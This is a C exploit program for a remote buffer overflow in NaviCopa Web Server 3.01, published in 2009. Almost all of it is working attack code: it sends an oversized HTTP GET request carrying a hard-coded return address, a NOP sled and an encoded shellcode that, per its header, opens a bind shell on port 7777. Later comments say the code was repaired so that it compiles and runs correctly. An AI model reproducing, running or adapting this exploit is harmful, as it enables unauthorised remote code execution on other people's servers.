# Title : NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit
# Published : 2009-08-24
# Author : SimO-s0fT
/* navicpnt_xp1.c
* NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit
* Credit : http://milw0rm.com/exploits/7966 >> Thanks To: e.wiZz!
*
* Coded by : SimO-s0fT >> Madridista ;)
* E-mail : Overflows[at]Hotmail[dot]com
* Tested on Windows XP SP2 (French), Windows 2000 SP4 (English)
* Example :
C:\Documents and Settings\Simo>navicpnt_xp1.exe 196.217.213.25
* ________________________________________________________________________________
*
* NaviCopa 3.01 Remote Buffer Overflow Exploit
* Coded By : SimO-s0fT [overflows@hotmail.com ]
*
* ____________________________________________________________________________
*
* [+] Connection established
* [+] Sending data... [Done]
*
* C:\Documents and Settings\Simo>telnet 196.217.213.25 7777
* Microsoft Windows XP [version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* Peace out
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <pthread.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#define SOCKET int
#define closesocket(s) close(s)
#endif
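/*
 * Payload appended after the NOP sled. The original header comment
 * describes it as a bind shell listening on TCP 7777 (see the telnet
 * example above). It is consumed by main() via strlen(), so it must not
 * contain a 0x00 byte. The "\x" escapes had been stripped by the page
 * extraction (leaving plain text like "xebx03..."), which made the array
 * a string of ASCII letters rather than code; they are restored here.
 */
char scode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
"\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
"\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
"\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
"\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
"\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
"\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
"\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
"\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
"\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
"\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
"\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
"\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
"\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
"\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
"\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
"\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
"\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
"\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
"\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
"\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
"\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
"\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
"\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
"\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
"\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
"\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
"\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
"\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
"\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
"\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x4d\x49\x6e\x62"
"\x62\x36\x4c\x5a\x33\x4c\x4d\x71\x4a\x65\x68\x6e\x4b\x4c\x6b\x4e"
"\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
"\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
"\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
"\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
"\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
"\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
"\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
"\x6f\x58\x56\x49\x6f\x78\x50\x61";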
#define OFFSET 232
#define NOP 0x90
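/*
 * Entry point: builds one oversized GET request and sends it to the target.
 *
 * argv[1] is the target IPv4 address in dotted-quad form; argv[2] is an
 * optional TCP port (default 80, which is what the original hard-coded).
 *
 * Request layout, offsets from the start of the buffer:
 *   [0 .. 3]                  "GET "
 *   [4 .. OFFSET-1]           0x41 filler
 *   [OFFSET .. OFFSET+3]      return address 0x7c9d2643 (little-endian)
 *   next NOP_LEN bytes        NOP sled
 *   next strlen(scode) bytes  payload (scode, defined above)
 *   trailing                  " HTTP/1.1\r\n\r\n"
 *
 * OFFSET and the return address are target-specific (the header says the
 * exploit was tested on XP SP2 / Win2k SP4); they will not transfer to
 * other builds or service packs.
 *
 * Differences from the original listing: the escape sequences in the
 * string literals had been stripped by extraction and are restored; a
 * missing argv[1] now exits instead of dereferencing NULL; the buffer is
 * sized with the real sled length instead of strlen() on an uninitialized
 * array; the exact request length is sent instead of strlen() on a buffer
 * that was never NUL-terminated; every resource is released on each exit
 * path; and the cosmetic system("CLS") is gone (no reason to spawn a shell).
 *
 * Returns 0 after the request was sent, 1 on any usage or network error.
 */
int main(int argc, char *argv[]){
    enum { NOP_LEN = 40, RET_LEN = 4 };
    static const char cmd_1[] = "GET ";
    static const char cmd_2[] = " HTTP/1.1\r\n\r\n";
    /* 0x7c9d2643 spelled out byte-wise so the wire order does not depend on host endianness */
    static const unsigned char ret_addr[RET_LEN] = { 0x43, 0x26, 0x9d, 0x7c };
    SOCKET s = (SOCKET)-1;
    char *buffer = NULL;
    struct sockaddr_in their_addr;
    WSADATA wsa;
    size_t scode_len, cmd_2_len, total, pos;
    long port = 80;
    int rc = 1;

    fprintf(stdout, "_________________________________________________________________________________________________________________\n\n");
    fprintf(stdout, "\t NaviCopa Web Server 3.01 Remote Buffer Overflow Exploit \n\t Coded By : SimO-s0fT [overflows@hotmail.com ]\n\n");
    fprintf(stdout, "_________________________________________________________________________________________________________________\n\n");

    if (argc < 2 || argc > 3) {
        printf("USAGE : %s [IP ADDRESS] [PORT]\n", argv[0]);
        printf("Example: navicpnt_xp1.exe 196.217.213.25\n");
        return 1;
    }
    if (argc == 3) {
        char *end = NULL;
        port = strtol(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || port < 1 || port > 65535) {
            printf("[-] Invalid port: %s\n", argv[2]);
            return 1;
        }
    }

    memset(&their_addr, 0, sizeof their_addr);
    their_addr.sin_family = AF_INET;
    their_addr.sin_addr.s_addr = inet_addr(argv[1]);
    their_addr.sin_port = htons((unsigned short)port);
    /* inet_addr() signals a malformed address with INADDR_NONE (all ones);
     * this also rejects the literal 255.255.255.255, which is never a
     * meaningful target here anyway. */
    if (their_addr.sin_addr.s_addr == 0xFFFFFFFFUL) {
        printf("[-] Invalid IP address: %s\n", argv[1]);
        return 1;
    }

    if (WSAStartup(MAKEWORD(2, 0), &wsa) != 0) {
        printf("[-] WSAStartup error\n");
        return 1;
    }

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == (SOCKET)-1) {
        printf("[-]Socket error \n");
        goto cleanup;
    }
    if (connect(s, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
        printf("[-]Connect error \n");
        goto cleanup;
    }
    printf("[+] Connection established\n");

    scode_len = strlen(scode);
    cmd_2_len = strlen(cmd_2);
    total = (size_t)OFFSET + RET_LEN + NOP_LEN + scode_len + cmd_2_len;
    /* +1 so the buffer is also a terminated C string; nothing below relies on it */
    buffer = malloc(total + 1);
    if (buffer == NULL) {
        printf("[-] Out of memory\n");
        goto cleanup;
    }

    memset(buffer, 0x41, total);              /* filler between "GET " and the return address */
    memcpy(buffer, cmd_1, sizeof cmd_1 - 1);
    pos = OFFSET;
    memcpy(buffer + pos, ret_addr, RET_LEN);  pos += RET_LEN;
    memset(buffer + pos, NOP, NOP_LEN);       pos += NOP_LEN;
    memcpy(buffer + pos, scode, scode_len);   pos += scode_len;
    memcpy(buffer + pos, cmd_2, cmd_2_len);   pos += cmd_2_len;
    buffer[pos] = '\0';

    /* send exactly what was built; the original used strlen() on an
     * unterminated buffer and could read (and send) past the allocation */
    if (send(s, buffer, (int)pos, 0) == -1) {
        printf("[-] Send error\n");
        goto cleanup;
    }
    printf("[+] Sending data... ");
    printf("[Done]\n");
    rc = 0;

cleanup:
    free(buffer);
    if (s != (SOCKET)-1) {
        closesocket(s);
    }
    WSACleanup();
    return rc;
}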